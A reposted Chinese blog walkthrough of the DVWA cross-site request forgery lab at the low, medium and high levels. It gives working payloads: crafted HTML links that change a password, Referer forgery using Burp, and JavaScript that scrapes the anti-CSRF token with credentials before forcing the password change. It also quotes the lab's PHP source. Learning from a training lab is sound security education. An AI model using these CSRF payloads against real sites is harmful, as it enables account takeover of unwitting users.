当前位置：首页 > news >正文

w28DVWA-csrf实例

news 文章来源：https://blog.csdn.net/zxcz123123421/article/details/136087923 2025/5/7 1:35:16

DVWA-csrf实例

low级别

修改密码：修改的密码通过get请求，暴露在url上。
在这里插入图片描述
写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html><body><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-low</a></body>
</html>

在这里插入图片描述

点击"dvwa-csrf-low"文字后，跳转到dvwa的修改密码界面，提示Password changed（密码已修改）。
在这里插入图片描述

middle级别

修改密码：修改的密码通过get请求，暴露在url上。
在这里插入图片描述
写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html><body><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-low</a></br><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-middle</a></body>
</html>

在这里插入图片描述
点击"dvwa-csrf-middle"文字后，跳转到dvwa的修改密码界面，提示the request didn’t look correct (请求不正确)。

查看源码发现，会校验http_referer和server_name两个参数不为空。

对比成功的请求与失败的请求，发现失败的请求缺失了referer，referer用来表示从哪个页面链接到当前的网页。用于浏览器的同源策略。
成功的请求
在这里插入图片描述
失败的请求

利用bp工具，补上referer的参数。

网上另外解法：修改host和referer为localhost或127.0.0.1，其实也是遵循同源策略。
在这里插入图片描述

high级别

修改密码：修改的密码通过get请求，暴露在url上，并且带上user_token。
在这里插入图片描述

写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html><body><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-low</a></br><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-middle</a></br><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=2&password_conf=2&Change=Change&user_token=96f6243c53766d30d5e51cf92c15f9a3#">dvwa-csrf-high</a></body>
</html>

在这里插入图片描述
点击"dvwa-csrf-high"文字后，跳转到dvwa的修改密码界面，提示csrf token is incorrect (csrf的token错误)。

在这里插入图片描述

对比成功的请求与失败的请求，发现失败的请求缺失了referer，referer用来表示从哪个页面链接到当前的网页。用于浏览器的同源策略。
成功的请求
在这里插入图片描述
失败的请求

利用bp工具，补上referer的参数。结果还是失败。因此查看源码，#1这行有进行token的校验。#2这行进行token生成，大致可以分析出token生成后一次性校验，跟验证码同理。

<?phpif( isset( $_GET[ 'Change' ] ) ) {// Check Anti-CSRF token  #1checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );// Get input$pass_new  = $_GET[ 'password_new' ];$pass_conf = $_GET[ 'password_conf' ];// Do the passwords match?if( $pass_new == $pass_conf ) {// They do!$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );// Update the database$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Feedback for the userecho "<pre>Password Changed.</pre>";}else {// Issue with passwords matchingecho "<pre>Passwords did not match.</pre>";}((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}// Generate Anti-CSRF token  #2
generateSessionToken();?>

基于分析出的结论，要构建一个新请求，先调用#2，再调用修改密码的请求，此时为了避免跨域问题。将写好的html直接放到dvwa下。

<html><body><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-low</a></br><a href="http://dvwa:7001/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#">dvwa-csrf-middle</a></br><a  href="javascript:void(0);" onclick="initJS()">dvwa-csrf-high</a></body><script >function initJS(){var theUrl = 'http://dvwa:7001/vulnerabilities/csrf/';
if(window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest();
}else{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState ==4 && xmlhttp.status==200){var text = xmlhttp.responseText;var regex = /user_token\' value\=\'(.*?)\' \/\>/;var match = text.match(regex);var token = match[1];var new_url = 'http://dvwa:7001/vulnerabilities/csrf/?user_token='+token+'&password_new=1&password_conf=1&Change=Change';if(count==0){count++;//此代码用于只执行一次修改密码xmlhttp.open("GET",new_url,false);xmlhttp.send();}}
};
xmlhttp.open("GET",theUrl,false);
xmlhttp.send();}</script>
</html>

在这里插入图片描述
用新密码可以成功登录，通关结束。

w28DVWA-csrf实例

DVWA-csrf实例

low级别

middle级别

high级别

相关文章：

w28DVWA-csrf实例

子网络划分与互通，上网行为审计

如何快速删除node_module依赖包

async/await 的用法

JAVA面试汇总总结更新中ing

vue-利用属性（v-if）控制表单（el-form-item）显示/隐藏

数据结构-邻接矩阵

基于CNN-GRU-Attention的时间序列回归预测matlab仿真

Docker部署Halo容器并结合内网穿透实现公网访问本地个人博客

纯css实现文字左右循环滚动播放效果

【Java EE初阶二十二】https的简单理解

系统学习Python——装饰器：类装饰器-[跟踪对象接口：基础知识]

go-redis 使用 redis 6.0.14 版本错误: consider implementing encoding.BinaryMarshaler

计网 - 域名解析的工作流程

普中51单片机学习（EEPROM）

智能风控体系之供应链业务模式

最少停车数（C 语言）

MAC M1安装vmware和centos7虚拟机并配置静态ip

java 课程签到管理系统Myeclipse开发mysql数据库web结构jsp编程servlet计算机网页项目

Linux——网络通信TCP通信常用的接口和tcp服务demo

【web | CTF】反序列化打法

如何在Linux搭建Inis网站，并发布至公网实现远程访问【内网穿透】

YOLOv9来了! 使用可编程梯度信息学习你想学的内容， v7作者新作！【文献速读】

【鸿蒙 HarmonyOS 4.0】网络请求

QT中的多线程有什么作用？

redis最佳实践

架构师技能9-深入mybatis:Creating a new SqlSession到查询语句耗时特别长

【JavaEE】_HTTP请求报头header

随想录刷题笔记 —二叉树篇10 450删除二叉搜索树节点 669修剪二叉搜索树 108有序数组转换为二叉搜索树

Docker基础篇(二)